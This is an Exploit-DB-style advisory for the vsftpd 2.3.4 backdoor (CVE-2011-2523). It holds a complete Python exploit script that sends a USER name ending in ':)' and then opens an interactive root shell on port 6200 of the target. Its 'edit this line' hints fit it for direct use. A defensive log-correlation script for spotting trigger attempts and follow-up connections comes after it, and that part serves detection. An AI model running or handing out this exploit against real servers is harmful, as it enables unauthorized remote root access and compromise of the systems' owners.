Vendor: vsftpd
By: HerculesRD
CVSS: 9.8 (CRITICAL)
Backdoor Command Execution
CWE: 78
Product Name: vsftpd
Affected Version From: 2.3.4
Affected Version To: 2.3.4
Patch Exists: YES
Related CVE: CVE-2011-2523
CPE: 2.3.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Debian
2021

vsftpd 2.3.4 – Backdoor Command Execution

vsftpd 2.3.4 contains a backdoor that allows an attacker to gain remote code execution. The attacker sends a USER command with a specially crafted argument to the FTP server, which will then execute arbitrary commands with root privileges.

Mitigation:

Upgrade to the latest version of vsftpd, or apply the patch provided by the vendor.

Exploit-DB raw data:

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

# Note: telnetlib was deprecated in Python 3.11 and removed in Python 3.13.
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit


def handler(signal_received, frame):
    # Handle any cleanup here
    print('   [+]Exiting...')
    exit(0)


signal(SIGINT, handler)
parser = argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21  # if necessary edit this line

# FTP login commands; the USER argument ends in ":)"
user = "USER nergal:)"
password = "PASS pass"

# Wait for the FTP banner, then send USER and PASS on the control connection
tn = Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)")  # if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.")  # if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

# Second connection, to port 6200 on the same host
tn2 = Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
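
A defender-side check for the sequence the script above performs, added here as an example that is not part of the original exploit or of vsftpd: it scans FTP protocol logs for USER arguments containing `:)` and correlates them with connections to port 6200 from the same client. The log format (vsftpd with `log_ftp_protocol=YES`), the flow tuples, the 60-second window and all sample data are assumptions constructed for illustration.

```python
import re
from datetime import datetime, timedelta

BACKDOOR_PORT = 6200            # port the script above connects to after login
WINDOW = timedelta(seconds=60)  # assumed correlation window

# Assumed log format: vsftpd.log written with log_ftp_protocol=YES.
FTP_CMD = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>[^"]*)"')

def trigger_attempts(log_lines):
    """Return (time, client_ip, username) for USER commands containing ':)'."""
    hits = []
    for line in log_lines:
        m = FTP_CMD.match(line)
        if m and ":)" in m["user"]:  # flagged anywhere in the name, not only at the end
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m["ip"], m["user"]))
    return hits

def confirmed_sessions(hits, flows):
    """Client IPs that sent a trigger and then reached BACKDOOR_PORT within WINDOW."""
    confirmed = set()
    for ts, ip, _ in hits:
        for f_ts, f_ip, f_port in flows:
            in_window = ts <= f_ts <= ts + WINDOW
            if f_ip == ip and f_port == BACKDOOR_PORT and in_window:
                confirmed.add(ip)
    return sorted(confirmed)

# Constructed sample data (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    'Fri Apr  9 10:15:01 2021 [pid 2] FTP command: Client "198.51.100.7", "USER anonymous"',
    'Fri Apr  9 10:15:02 2021 [pid 3] FTP command: Client "192.0.2.10", "USER nergal:)"',
    'Fri Apr  9 10:16:40 2021 [pid 4] FTP command: Client "203.0.113.5", "USER bob:)"',
]
SAMPLE_FLOWS = [  # (time, source IP, destination port) from a hypothetical flow log
    (datetime(2021, 4, 9, 10, 15, 4), "192.0.2.10", 6200),
    (datetime(2021, 4, 9, 10, 15, 9), "198.51.100.7", 21),
]

if __name__ == "__main__":
    hits = trigger_attempts(SAMPLE_LOG)
    for ts, ip, user in hits:
        print(f"{ts} trigger attempt from {ip}: USER {user!r}")
    print("reached port 6200:", confirmed_sessions(hits, SAMPLE_FLOWS))
```

A trigger attempt alone shows someone probing for the backdoor; a follow-up connection to port 6200 from the same address indicates the host answered and should be treated as compromised.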